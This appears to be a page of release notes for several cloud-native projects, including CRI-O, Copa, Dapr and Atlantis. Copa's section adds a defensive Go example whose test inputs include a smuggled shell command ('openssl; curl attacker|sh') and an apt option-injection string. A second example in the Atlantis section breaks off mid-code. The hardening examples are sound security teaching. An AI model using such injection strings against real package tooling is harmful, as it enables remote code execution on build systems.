OpenYurt incubating

An open platform that extends your native Kubernetes to the edge.

v1.7.0

What's New

OTA Upgrade Supports Image Preheating for DaemonSet

OTA (Over-The-Air) upgrade is the upgrade model OpenYurt introduced for DaemonSet workloads. In previous versions, image pulling occurred synchronously during the Pod restart phase of the upgrade, making it a critical-path operation that directly contributed to service downtime, especially in edge environments with limited or unstable network connectivity.

In v1.7.0, OTA upgrade now supports image preheating, which decouples image pulling from the actual rollout cutover. A new ImagePreHeat controller is responsible for dispatching image preheating Jobs to edge nodes, allowing updated container images to be proactively downloaded before the upgrade is triggered. Two new Pod conditions (PodNeedUpgrade and PodImageReady) are introduced to track upgrade status and image readiness. Users can initiate preheating via a new OTA API endpoint (POST /openyurt.io/v1/namespaces/{ns}/pods/{podname}/imagepull). By pre-caching images ahead of the cutover, service interruption during the actual upgrade is minimized to near-zero.
#2482
#2474

Support Deploying Kubernetes Clusters Locally (K8s-on-K8s)

OpenYurt v1.7.0 introduces the ability to deploy a Kubernetes cluster on top of an existing OpenYurt cluster — referred to as K8s-on-K8s. This is particularly useful for scenarios such as testing, multi-tenant isolation, and edge IDC (Internet Data Center) deployments where a full bare-metal Kubernetes setup is not practical.

This release adds YAML-based templates for deploying tenant control-plane components (tenant-apiserver, tenant-controller-manager, tenant-scheduler, tenant-pki-generator, etcd) along with post-install configuration (kube-proxy, kubelet, rbac, bootstrap-secret). yurtadm now supports a local mode for joining IDC nodes into a K8s-on-K8s cluster, and YurtHub is optimized for local mode operation. A setup script (config/setup/K8s-on-K8s/setup.sh) is also provided for quick bootstrapping.
#4a1f0ab3
#ed2f7dbf
#3a03b00d

Label-Driven YurtHub Deployment via YurtNodeConversion

Previously, YurtHub installation and lifecycle management on edge nodes required manual intervention through yurtadm join or yurtadm reset commands. In v1.7.0, a new YurtNodeConversionController in yurt-manager enables label-driven YurtHub deployment and conversion. By applying a label to a node, users can trigger the automatic installation, configuration, and startup of YurtHub via systemd. The conversion and revert process now uses reusable host lifecycle helpers, enabling a fully declarative, controller-driven workflow for edge node onboarding and offboarding.
#249a6714
#f7645df8
#3e02cefa

Support Kubernetes v1.34

All k8s.io/xxx dependencies and related modules have been upgraded to v1.34.0, ensuring OpenYurt is fully compatible with Kubernetes v1.34. E2E testing has been updated to validate the upgrade against a Kubernetes v1.34 cluster. This upgrade also includes vendor dependency updates and Go linting fixes for compatibility with the latest toolchain.
#5cccf119
#7589921e

Other Notable changes

Fixes

  • Always overwrite server-addr in yurt-static-set-yurt-hub configmap by yurtadm by @rayne-Li in #2271
  • Test: fix nodepool e2e test by @tnsimon in #2283
  • Fix openyurt fuzz test by @tnsimon in #2319
  • Fix issue 2253 by @RG-Dou in #2330
  • Ensure hub leader configmap is deleted with nodepool by @tnsimon in #2324
  • Fix ota controller doesn't have permission to patch pod status by @PersistentJZH in #2415
  • Fix: Fix the issue where the masterservice and serviceenvupdater modified the multiplexer cache by @zyjhtangtang in #2481
  • Fix dummy-if name length exceeds 15 by @KubeKyrie in #2486
  • Bugfix: remove deprecated rand.Seed() calls by @shiavm006 in #2499
  • Fix: race condition in cache manager's inMemoryCache by @Shivam Mittal in #2508
  • Fix: restore from backup and return error on ReplaceComponentList create/write failure by @Shivam Mittal in #2507
  • Fix NodeAutonomy condition LastTransitionTime never being updated by @aman Kumar in #2502
  • Fix: guard nil request info in autonomy proxy by @Shivam Mittal in #2517
  • Fix: nil pointer dereference in local proxy (localDelete/localPost) by @Shivam Mittal in #2515
  • Fix: avoid panic on pod without owner refs by @zyjhtangtang in #2509
  • Fix: add unit test cases for modifyresponse by @kartik angiras in #2497
  • Fix/UT error by @tnsimon in #2535

Proposals

New Contributors

Full Changelog: v1.6.0...v1.7.0

Keycloak incubating

Keycloak is an open-source identity and access management solution for modern applications and services, built on top of industry security standard protocols.

nightly

[quarkus-next] Aurora CI fails with missing quarkus-bom:999-SNAPSHOT …

…on remote EC2 VM (#48595)

Closes: #48594

Signed-off-by: Peter Zaoral <pzaoral@redhat.com>

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

v1.3.2

[Backport release-1.3] fix(seaweedfs): pass filer.replicas and s3.rep…

Cozystack sandbox

Cozystack is a free PaaS platform and framework for building private clouds and providing users/customers with managed Kubernetes, KubeVirt-based VMs, databases as a service, NATS, message brokers, etc. with GPU support in VMs and Kubernetes clusters.

api/apps/v1alpha1/v1.2.4

[Backport release-1.2] fix(harbor): remove incorrect tenant module fl…

Copa sandbox

CLI tool for directly patching container image vulnerabilities

v0.14.0

✨ Features

  • Go binary patching — patch vulnerable Go binaries by rebuilding from source with updated stdlib/deps (#1388)
  • Arch Linux support — pacman package manager (#1467)
  • RPM chroot-based patching — patch RPM images that are missing a package manager (#1473)
  • Python virtual environment patching — support venv-based site-packages via PkgPath (#1485)
  • Bulk patching improvements — skip detection and cross-registry support (#1475)
  • Test environment utilities for BuildKit integration tests (#1399)
  • Demo recordings + asciinema player added to the website (#1453)
  • Patch summary output showing total/patched/skipped vulnerabilities (#1517)
  • Fallback source resolution for Go binary patching on stripped/distroless images (#1546)

🔒 Security hardening

  • Bump otel/sdk to fix CVE-2026-24051 (#1483)
  • Validate RPM package names before distroless shell execution (#1541)
  • Validate RPM package names in dnf chroot path (#1529)
  • Validate Node.js npm tarballs before extraction (#1533)
  • Prevent Node.js shell injection via untrusted package paths (#1538)
  • Validate .NET deps.json script inputs to prevent command injection (#1537)
  • Prevent Go module flag injection via leading-dash names (#1526)
  • Prevent tag-based command injection in release workflow (#1535)
  • Codebase audit hardening (#1507)
  • Prevent apt option injection from distroless package names (#1540)
  • Cap buffered patch layer size to mitigate memory DoS (#1543)
  • Block self-hosted build workflow jobs on forked PRs (#1539)
  • Replace label-gated trusted-fork workflow with native fork PR approval (#1582, supersedes #1572, #1573)
  • Reject whitespace/control chars in Go binary path validation (#1586)
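The input classes behind several of the entries above (package names reaching apt/dnf, leading-dash names read as flags, whitespace and control characters, a buffered layer with no size cap) share one pattern: scanner output is untrusted. The following is an added example, not Copa's code, showing the vulnerable shape beside a hardened one. The package-name grammar is an assumption (a deliberately conservative subset of what rpm and dpkg accept), and the function names and the size cap passed to ReadLayerBounded are this example's own.

```go
package main

// Added example, not Copa's own code. The name grammar below is an assumed
// conservative subset of rpm/dpkg naming; callers choose the layer cap.

import (
	"errors"
	"fmt"
	"io"
	"os/exec"
	"regexp"
	"strings"
)

var (
	ErrInvalidPkgName = errors.New("invalid package name")
	ErrLayerTooLarge  = errors.New("patch layer exceeds size cap")
)

// pkgNameRE: first byte alphanumeric (so no leading dash), then a closed set.
// Whitespace, control characters, shell metacharacters and "=" are all excluded;
// Go's "$" matches only at end of text, so a trailing newline also fails.
var pkgNameRE = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._+~:-]*$`)

const maxPkgNameLen = 255

// ValidatePkgName is the control that actually stops option injection: a name
// beginning with "-" is parsed as a flag by apt-get, dnf and the go tool even
// when it is passed as its own argv element.
func ValidatePkgName(name string) error {
	switch {
	case name == "" || len(name) > maxPkgNameLen:
		return fmt.Errorf("%w: empty or longer than %d bytes", ErrInvalidPkgName, maxPkgNameLen)
	case strings.HasPrefix(name, "-"):
		return fmt.Errorf("%w: leading dash would be read as an option: %q", ErrInvalidPkgName, name)
	case !pkgNameRE.MatchString(name):
		return fmt.Errorf("%w: disallowed characters in %q", ErrInvalidPkgName, name)
	}
	return nil
}

// VulnerableInstallCmd is the shape to avoid: names from a scanner report are
// joined into one shell line, so "openssl; curl attacker|sh" runs two commands.
func VulnerableInstallCmd(names []string) *exec.Cmd {
	return exec.Command("sh", "-c", "apt-get install -y "+strings.Join(names, " "))
}

// HardenedInstallCmd validates every name and passes each as a separate argv
// element with no shell in between. Both halves matter: argv alone still lets
// "-o=Dir::Bin::Dpkg=/tmp/x" reach apt-get as an option.
func HardenedInstallCmd(names []string) (*exec.Cmd, error) {
	for _, n := range names {
		if err := ValidatePkgName(n); err != nil {
			return nil, err
		}
	}
	args := append([]string{"install", "-y"}, names...)
	return exec.Command("apt-get", args...), nil
}

// ReadLayerBounded buffers at most max bytes. Reading max+1 distinguishes
// "exactly max" from "truncated", so an oversized layer is rejected outright
// instead of being silently cut short, and memory stays bounded per image.
func ReadLayerBounded(r io.Reader, max int64) ([]byte, error) {
	buf, err := io.ReadAll(io.LimitReader(r, max+1))
	if err != nil {
		return nil, err
	}
	if int64(len(buf)) > max {
		return nil, fmt.Errorf("%w (> %d bytes)", ErrLayerTooLarge, max)
	}
	return buf, nil
}

func main() {
	// Constructed scanner output: one honest name and two crafted ones.
	names := []string{"libssl3", "-o=Dir::Bin::Dpkg=/tmp/x", "openssl; curl attacker|sh"}
	fmt.Println("shell line built by the vulnerable path:", VulnerableInstallCmd(names).Args[2])
	for _, n := range names {
		fmt.Printf("%-28q -> %v\n", n, ValidatePkgName(n))
	}
	if _, err := HardenedInstallCmd(names); err != nil {
		fmt.Println("hardened path refused:", err)
	}
}
```

The same allowlist idea carries over to the npm tarball, .NET deps.json and Go module cases in the list: validate the identifier against the grammar the downstream tool expects, then hand it over as data (an argv element, a file path) rather than as text the tool re-parses.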

🐛 Bug fixes

  • VEX: use installed version in PURLs and add distro qualifier for BOM-VEX correlation (#1552)
  • Avoid masking package manager failures as no-updates (#1530)
  • Restore strict multi-platform failure behavior when ignore-errors=false (#1532)
  • Suppress NU1605 in generated patch.csproj for .NET (#1557)
  • Filter App.Runtime images in .NET patching (#1501)
  • Replace npm install with direct tarball replacement (#1479)
  • Resolve TUI freeze and CLI deadlock on early build errors (#1505)
  • Close progress channel when no platforms need patching (#1528)
  • Migrate docker/docker to moby/moby/client (#1525)
  • Go patching log levels (#1516)
  • Keep frontend.Dockerfile Go version aligned with go.mod and harden release pipeline (#1571)

⬆️ Dependency upgrades

  • BuildKit 0.28.1 (#1512)
  • Trivy v0.69.3 + OpenTelemetry-Go v1.43.0 (#1558)
  • google.golang.org/grpc 1.78.0 → 1.79.3 (#1480, #1502)
  • github.com/quay/claircore 1.5.45 → 1.5.52 (#1442, #1464, #1518)
  • github.com/google/go-containerregistry 0.20.7 → 0.21.3 (#1520)
  • k8s.io/apimachinery 0.35.0 → 0.35.2 (#1470, #1487)
  • testcontainers-go 0.38.0 → 0.40.0 (#1438)
  • Plus dependabot bumps for dependency groups across the project

🧹 Internal / CI

  • Refactor: structured rebuildFailure replaces rebuildErrors []string in langmgr (#1560)
  • Stabilize CI — golangci-lint alignment, deterministic tests, network retries (#1477)
  • Pin BuildKit version and set explicit DNS for podman/container env (#1563)
  • Pin scanner-plugin-template dependency in build workflow (#1544)

📚 Docs

  • Improve buildkit-frontend examples (#1498)
  • Generate v0.13.x docs (#1437)
  • Remove Microsoft support policy section from SUPPORT.md (#1455)
  • Update website footer to LF Projects Series LLC trademark disclaimer (#1566)
  • add Verity to Copa CLI adopters (#1583)

Dapr graduated

The Distributed Application Runtime (Dapr) provides APIs that simplify microservice architecture development and increase developer productivity. Whether your communication pattern is service-to-service invocation or pub/sub messaging, Dapr helps you write resilient and secured microservices....

Dapr Runtime v1.18.0-rc.2

This is the release candidate 1.18.0-rc.2

What's Changed

  • [Backport release-1.18] Workflow: Fix recursive cross-app purge and terminate by @dapr-bot in #9864
  • [Backport release-1.18] Sidecar Injector supports Native Sidecars by @dapr-bot in #9861
  • [Backport release-1.18] placement: post-round coalesce window + stable scheduler reload by @dapr-bot in #9863
  • [Backport release-1.18] Remove MCPServerResource and WorkflowAccessPolicy feature gates by @dapr-bot in #9866
  • [Backport release-1.18] Integration: speed up tests by @dapr-bot in #9865
  • [Backport release-1.18] WorkflowAccessPolicy: Extend to all workflow operations by @dapr-bot in #9869
  • [Backport release-1.18] [1.18] Add hard anti-affinity policy option for placement and scheduler by @dapr-bot in #9862
  • [Backport release-1.18] workflow: gracefully stall on oversized payload by @dapr-bot in #9868
  • [Backport release-1.18] fix: remove availability zone requirement from AKS test clusters by @dapr-bot in #9874
  • [Backport release-1.18] Workflow: prevent orphan workflows when scheduler pod is killed by @dapr-bot in #9872
  • [Backport release-1.18] feat: improve output message of ErrActorNoAddress by adding req.ActorKey() by @dapr-bot in #9859
  • [Backport release-1.18] fix: Proto files must have different java outer classname by @dapr-bot in #9879
  • [Backport release-1.18] fix(placement): always arm coalesce timer after round to fix dissemination race by @dapr-bot in #9881
  • [Backport release-1.18] Update go-jose & OpenTelemetry by @dapr-bot in #9887
  • [Backport release-1.18] WorkflowAccessPolicy: pure allow-list with self-call exemption by @dapr-bot in #9888
  • [Backport release-1.18] Workflow: child workflow & activity attestation by @dapr-bot in #9889
  • [Backport release-1.18] Injector/Operator: use RSA keys for webhook serving certs by @dapr-bot in #9891

Full Changelog: v1.18.0-rc.1...v1.18.0-rc.2

LoxiLB sandbox

eBPF based cloud-native load-balancer. Powering Kubernetes|Edge|5G|IoT|XaaS Apps.

vlatest

Merge pull request #874 from TrekkieCoder/main

gh-868 Generate packages runnable with systemd

Istio graduated

Simplify observability, traffic management, security, and policy with the Istio service mesh.

Istio 1.30.0-rc.0

Spin sandbox

Spin is a framework for building and deploying serverless applications in WebAssembly.

canary

This is a "canary" release of the most recent commits on our main branch. Canary is not stable.
It is only intended for developers wishing to try out the latest features in Spin, some of which may not be fully implemented.

CRI-O graduated

CRI-O is a secure, performant, and stable Container Runtime Interface (CRI) implementation for the Kubelet to orchestrate Open Container Initiative (OCI) containers in production Kubernetes environments. CRI-O's scope is only targeted at Kubernetes, and thus can be performance optimized, rigorously tested and securely tuned for running containers, pods and images in Kubernetes clusters.

v1.36.0

CRI-O v1.36.0

The release notes have been generated for the commit range
v1.35.0...v1.36.0 on Tue, 05 May 2026 18:27:19 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

The OpenVEX report for this release is available at:

The SLSA provenance attestation for this release is available at:

All release artifacts (bundles, SBOMs, VEX, and provenance) are also available as signed OCI artifacts at ghcr.io/cri-o/bundle:v1.36.0.

To verify the artifact signatures via cosign, run the following (the COSIGN_EXPERIMENTAL variable only matters for cosign 1.x, where it enables keyless verification; cosign 2.x verifies keyless signatures by default and no longer needs it):

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.36.0.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.36.0.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.36.0.tar.gz
> bom validate -e cri-o.amd64.v1.36.0.tar.gz.spdx -d cri-o

To verify the OpenVEX vulnerability report, run:

> cosign verify-blob cri-o.v1.36.0.openvex.json \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.v1.36.0.openvex.json.bundle

To verify the SLSA provenance attestation, run:

> cosign verify-blob cri-o.v1.36.0.provenance.json \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.v1.36.0.provenance.json.bundle

Changelog since v1.35.0

Changes by Kind

Other

  • Nri: pass any container POSIX rlimits to NRI plugins as input. (#9707, @klihub)
  • Nri: pass any container user ID/group ID information to NRI plugins as input (#9708, @klihub)
  • Nri: pass more complete container status to NRI, including PID, exit code, and timestamps from container creation, start, and exit events (#9706, @klihub)

Dependency-Change

Feature

  • Add OpenVEX vulnerability report generation for releases (#9767, @saschagrunert)
  • Add container_runtime_crio_default_runtime metric to display which default runtime the node is configured to use (#9870, @haircommander)
  • Added tls_min_version and tls_cipher_suites configuration options to [crio.api] for configuring TLS settings on streaming and metrics servers. Supports TLS 1.2 (default) and TLS 1.3. (#9723, @asahay19)
  • Added support for configuring additional read-only artifact stores via the additional_artifact_stores configuration option. (#9702, @pauloappbr)
  • Implement StreamContainers, StreamContainerStats, StreamPodSandboxes, StreamPodSandboxStats, StreamPodSandboxMetrics, StreamImages (#9761, @bitoku)

Bug or Regression

  • Fix concurrent RemoveImage race condition by handling ErrNotAnImage as an idempotent deletion result. (#9803, @jnovy)
  • Fixed UpdateContainerResources to apply cgroupv2 unified settings (#9820, @PannagaRao)
  • Fixed a bug where CRI-O didn't return all metrics when "all" is set. (#9719, @bitoku)
  • Fixed a panic when concurrent StopContainer calls race against the stop lifecycle completing. (#9799, @sabujmaity)
  • Fixed a regression in v1.35.0 where systemd containers with hostUsers: false (user namespaces enabled) would fail with "Permission denied" errors when systemd attempted to create cgroups. (#9712, @saschagrunert)
  • Fixed cases where regular container images could accidentally be pulled into the OCI artifact store (#9782, @bitoku)
  • Fixed the race condition where cri-o reports exitCode 255 when the container exits fast. (#9846, @bitoku)
  • PullImage now returns the image ID directly, ensuring compatibility with Kubernetes credential verification for image pulls. (#9728, @saschagrunert)
  • Respect the same pinned_images configuration used by regular container images (#9836, @bitoku)

Other (Cleanup or Flake)

  • Skip the OCI artifact pull fallback when the initial image pull fails due to a retryable error (#9778, @bitoku)

Uncategorized

  • Add min_injected_gomaxprocs option, which allows a user to specify GOMAXPROCS in every container CRI-O creates. The config field itself is an integer that represents the floor of GOMAXPROCS. CRI-O will inject max(floor, cpu.request), if the pod is not a guaranteed pod or is part of a partitioned workload (#9860, @harche)
  • CRI-O now continuously monitors CNI plugin health using the STATUS verb. If a plugin becomes unhealthy after initial readiness, the node is reported as NetworkReady=false, preventing pod scheduling on affected nodes. The node self-heals when the plugin recovers. (#9855, @tsorya)

Dependencies

Added

  • cyphar.com/go-pathrs: v0.2.1
  • github.com/checkpoint-restore/go-criu/v8: v8.2.0
  • github.com/clipperhouse/displaywidth: v0.6.0
  • github.com/clipperhouse/stringish: v0.1.1
  • github.com/clipperhouse/uax29/v2: v2.3.0
  • github.com/mistifyio/go-zfs/v4: v4.0.0
  • github.com/olekukonko/cat: 50322a0
  • k8s.io/cri-streaming: v0.36.0-rc.0
  • k8s.io/streaming: v0.36.0-rc.0

Changed

  • capnproto.org/go/capnp/v3: v3.1.0-alpha.1 → v3.1.0-alpha.2
  • cel.dev/expr: v0.24.0 → v0.25.1
  • github.com/BurntSushi/toml: v1.5.0 → v1.6.0
  • github.com/avast/retry-go/v4: v4.6.1 → v4.7.0
  • github.com/checkpoint-restore/checkpointctl: v1.4.0 → v1.5.0
  • github.com/cncf/xds/go: 0feb691 → ee656c7
  • github.com/containerd/console: v1.0.4 → v1.0.5
  • github.com/containerd/containerd: v1.7.29 → v1.7.30
  • github.com/containerd/stargz-snapshotter/estargz: v0.17.0 → v0.18.2
  • github.com/containers/conmon-rs: 737e4d6 → v0.7.3
  • github.com/coreos/go-systemd/v22: v22.6.0 → v22.7.0
  • github.com/cyphar/filepath-securejoin: v0.4.1 → v0.6.1
  • github.com/docker/cli: v28.5.1+incompatible → v29.1.5+incompatible
  • github.com/docker/docker-credential-helpers: v0.9.4 → v0.9.5
  • github.com/docker/docker: v28.5.1+incompatible → v28.5.2+incompatible
  • github.com/emicklei/go-restful/v3: v3.12.2 → v3.13.0
  • github.com/envoyproxy/go-control-plane/envoy: v1.35.0 → v1.36.0
  • github.com/envoyproxy/go-control-plane: 75eaa19 → v0.14.0
  • github.com/envoyproxy/protoc-gen-validate: v1.2.1 → v1.3.0
  • github.com/go-chi/chi/v5: v5.2.3 → v5.2.5
  • github.com/godbus/dbus/v5: v5.2.0 → v5.2.2
  • github.com/google/go-containerregistry: v0.20.6 → v0.20.7
  • github.com/google/pprof: f64d9cf → 294ebfa
  • github.com/grpc-ecosystem/grpc-gateway/v2: v2.27.3 → v2.28.0
  • github.com/klauspost/compress: v1.18.0 → v1.18.3
  • github.com/mattn/go-runewidth: v0.0.16 → v0.0.19
  • github.com/mattn/go-sqlite3: v1.14.32 → v1.14.33
  • github.com/maxbrunsfeld/counterfeiter/v6: v6.12.0 → v6.12.1
  • github.com/moby/spdystream: v0.5.0 → v0.5.1
  • github.com/olekukonko/ll: v0.0.9 → v0.1.3
  • github.com/olekukonko/tablewriter: v1.1.0 → v1.1.2
  • github.com/onsi/ginkgo/v2: v2.27.3 → v2.28.1
  • github.com/onsi/gomega: v1.38.3 → v1.39.1
  • github.com/opencontainers/runc: v1.3.2 → v1.4.0
  • github.com/opencontainers/runtime-tools: edf4cb3 → 5e63903
  • github.com/opencontainers/selinux: v1.12.0 → v1.13.1
  • github.com/pkg/sftp: v1.13.9 → v1.13.10
  • github.com/proglottis/gpgme: v0.1.5 → v0.1.6
  • github.com/prometheus/common: v0.67.4 → v0.67.5
  • github.com/prometheus/procfs: v0.17.0 → v0.19.2
  • github.com/secure-systems-lab/go-securesystemslib: v0.9.1 → v0.10.0
  • github.com/sergi/go-diff: 5b0b94c → v1.4.0
  • github.com/sigstore/sigstore: v1.10.0 → v1.10.3
  • github.com/sirupsen/logrus: v1.9.3 → v1.9.4
  • github.com/urfave/cli: v1.22.16 → v1.22.17
  • github.com/vbauerster/mpb/v8: v8.10.2 → v8.11.3
  • go.opentelemetry.io/contrib/detectors/gcp: v1.38.0 → v1.39.0
  • go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc: v0.64.0 → v0.66.0
  • go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp: v0.63.0 → v0.65.0
  • go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/exporters/otlp/otlptrace: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/metric: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/sdk/metric: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/sdk: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel/trace: v1.39.0 → v1.41.0
  • go.opentelemetry.io/otel: v1.39.0 → v1.41.0
  • go.podman.io/common: v0.66.1 → 1e46b07
  • go.podman.io/storage: v1.61.0 → b0f86df
  • golang.org/x/crypto: v0.46.0 → v0.48.0
  • golang.org/x/mod: v0.30.0 → v0.32.0
  • golang.org/x/net: v0.48.0 → v0.51.0
  • golang.org/x/oauth2: v0.33.0 → v0.35.0
  • golang.org/x/sys: v0.39.0 → v0.41.0
  • golang.org/x/telemetry: bc8e575 → bd525da
  • golang.org/x/term: v0.38.0 → v0.40.0
  • golang.org/x/text: v0.32.0 → v0.34.0
  • golang.org/x/tools: v0.39.0 → v0.41.0
  • google.golang.org/genproto/googleapis/api: ff82c1b → 4cfbd41
  • google.golang.org/genproto/googleapis/rpc: ff82c1b → 4cfbd41
  • google.golang.org/grpc: v1.77.0 → v1.79.3
  • google.golang.org/protobuf: v1.36.10 → f2248ac
  • k8s.io/api: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/apimachinery: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/apiserver: v0.35.0-rc.0 → v0.26.2
  • k8s.io/client-go: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/component-base: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/cri-api: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/cri-client: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/klog/v2: v2.130.1 → v2.140.0
  • k8s.io/kube-openapi: 589584f → 43fb72c
  • k8s.io/kubelet: v0.35.0-rc.0 → v0.36.0-rc.0
  • k8s.io/utils: bc988d5 → b8788ab
  • sigs.k8s.io/knftables: v0.0.19 → v0.0.20
  • sigs.k8s.io/release-utils: v0.12.2 → v0.12.3
  • sigs.k8s.io/structured-merge-diff/v6: v6.3.0 → v6.3.2

Removed

  • github.com/antlr4-go/antlr/v4: v4.13.0
  • github.com/checkpoint-restore/go-criu/v6: v6.3.0
  • github.com/coreos/go-oidc: v2.3.0+incompatible
  • github.com/coreos/go-semver: v0.3.1
  • github.com/google/cel-go: v0.26.0
  • github.com/gregjones/httpcache: 901d907
  • github.com/jonboulle/clockwork: v0.5.0
  • github.com/klauspost/cpuid/v2: v2.0.4
  • github.com/minio/sha256-simd: v1.0.0
  • github.com/pquerna/cachecontrol: v0.1.0
  • github.com/stoewer/go-strcase: v1.3.0
  • github.com/tmc/grpc-websocket-proxy: 673ab2c
  • github.com/xiang90/probing: a49e3df
  • go.etcd.io/etcd/api/v3: v3.6.5
  • go.etcd.io/etcd/client/pkg/v3: v3.6.5
  • go.etcd.io/etcd/client/v3: v3.6.5
  • go.etcd.io/etcd/pkg/v3: v3.6.5
  • go.etcd.io/etcd/server/v3: v3.6.5
  • go.etcd.io/raft/v3: v3.6.0
  • gopkg.in/go-jose/go-jose.v2: v2.6.3
  • gopkg.in/natefinch/lumberjack.v2: v2.2.1
  • k8s.io/kms: v0.35.0-rc.0
  • sigs.k8s.io/apiserver-network-proxy/konnectivity-client: v0.31.2

Kgateway sandbox

An Envoy-powered, Kubernetes-native API Gateway that integrates Kubernetes Gateway API with a control plane for API connectivity in any cloud environment.

v2.3.0-rc.1

🎉 Welcome to the v2.3.0-rc.1 release of the kgateway project!

Release Notes

Changes since v2.3.0-beta.7

New Features

  • Adds ServiceMonitor support to the controller Helm chart. (#13565)

Bug Fixes

  • Adds support for promoted v1 TLSRoute resources. (#13949)
  • Include source policy reference in route status messages when a route is dropped or replaced due to invalid policy configuration (#13957)
  • fix: Process all Gateway tls.certificateRefs and add any valid ones. (#13970)
  • Fix rust module upgrade issue (#13979)

Cleanup

  • Validate http-acl CIDR at translation time (#13974)

Contributors

Thanks to all the contributors who made this release possible:

@1Shubham7 @alexliu541 @andy-fong @chandler-solo @danehans @nfuden @pkruk @puertomontt @sebastiangaiser @sheidkamp

Installation

The kgateway project is available as a Helm chart and docker images.

Helm Charts

The Helm charts are available at:

Docker Images

The docker images are available at:

  • cr.kgateway.dev/kgateway-dev/kgateway:v2.3.0-rc.1
  • cr.kgateway.dev/kgateway-dev/sds:v2.3.0-rc.1
  • cr.kgateway.dev/kgateway-dev/envoy-wrapper:v2.3.0-rc.1

Quickstart

Try installing this release:

helm install kgateway-crds oci://cr.kgateway.dev/kgateway-dev/charts/kgateway-crds --version v2.3.0-rc.1 --namespace kgateway-system --create-namespace
helm install kgateway oci://cr.kgateway.dev/kgateway-dev/charts/kgateway --version v2.3.0-rc.1 --namespace kgateway-system --create-namespace

For detailed installation instructions and next steps, please visit our quickstart guide.

Confidential Containers sandbox

Confidential Containers is an open source community working to enable cloud native confidential computing by leveraging Trusted Execution Environments to protect containers and data.

v0.20.0

For more information on this release see the release notes and the quickstart guide.

Confidential Containers sandbox

Confidential Containers is an open source community working to enable cloud native confidential computing by leveraging Trusted Execution Environments to protect containers and data.

v0.19.0

For more information on this release see the release notes and the quickstart guide.

wasmCloud incubating

v2.0.7

What's Changed

New Contributors

Full Changelog: v2.0.5...v2.0.7

Atlantis sandbox

Terraform Pull Request Automation for Teams

v0.43.0

What's Changed

Provider AzureDevops

  • fix: webhook authentication for Azure DevOps Server by @Zamiell in #6159

Provider GitHub

Provider GitLab

  • fix: support GitLab hosted under a URL subpath by @philslab-ninja in #6406
  • fix(gitlab): prevent PullIsMergeable from self-blocking on Atlantis commit statuses by @gian25-work in #6369

Bug fixes 🐛

  • fix(events): make undiverged honor module autoplanning by @krewenki in #6428
  • fix: Prevent infinite Gitea pagination loops by @shblue21 in #6032
  • fix: trigger PR event handling on PR updates for Gitea/Forgejo by @kfkonrad in #6178
  • fix: prevent diffKeywordRegex from falsely matching YAML key=value list items in heredocs by @GMartinez-Sisti in #6422
  • fix: cancellation bug for parallel invocations without execution_order and a larger amount of tasks than the poolSize by @ramonvermeulen in #6215
  • fix: respect autodiscover.ignore_paths during apply-all by @jholm117 in #6397
  • fix(events): prevent autoplan module recursion cycles by @krewenki in #6025
  • fix: Reorder autodiscover logic by @lukemassa in #6240
  • fix: include error values in init_step_runner log messages by @kuishou68 in #6382
  • fix: use read lock for clone reuse check to unblock parallel plans by @matthewmrichter in #6376
  • fix(kustomize): pin image tag to v0.42.0 instead of latest by @nicknikolakakis in #6400

Security changes

  • fix: harden VCS comment parsing against injection with configurable blocked-args by @Copilot in #6225
  • build(docker): strip file capabilities from image filesystem by @milindc2031 in #6363
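The comment-parsing hardening in #6225 is the kind of change worth seeing in code: PR comments are attacker-reachable input, and anything after the "--" separator is forwarded to terraform. The following is an added example, not Atlantis's own parser. It assumes Atlantis's documented comment syntax ("atlantis plan -d <dir> -- <extra args>"); the blocked-args matching rules, the set of accepted sub-commands, the directory check and all identifiers are this example's own, since the release note only says the list is configurable.

```go
package main

// Added example, not Atlantis's code. Assumes the "atlantis <cmd> -d <dir> -- <args>"
// comment form; the blocking and directory rules are this example's own.

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
	"unicode"
)

var ErrBlockedArg = errors.New("blocked terraform argument")

var allowedCommands = map[string]bool{"plan": true, "apply": true}

type Parsed struct {
	Command   string
	Dir       string
	ExtraArgs []string // forwarded to terraform verbatim, hence the blocklist
}

type Parser struct {
	Executable  string   // e.g. "atlantis"
	BlockedArgs []string // flag names, with or without dashes, e.g. "-var-file"
}

// canonical strips leading dashes and any "=value" suffix so that "-var-file",
// "--var-file" and "-var-file=x" all compare equal, while "-var" stays distinct.
func canonical(arg string) string {
	arg = strings.TrimLeft(arg, "-")
	if i := strings.IndexByte(arg, '='); i >= 0 {
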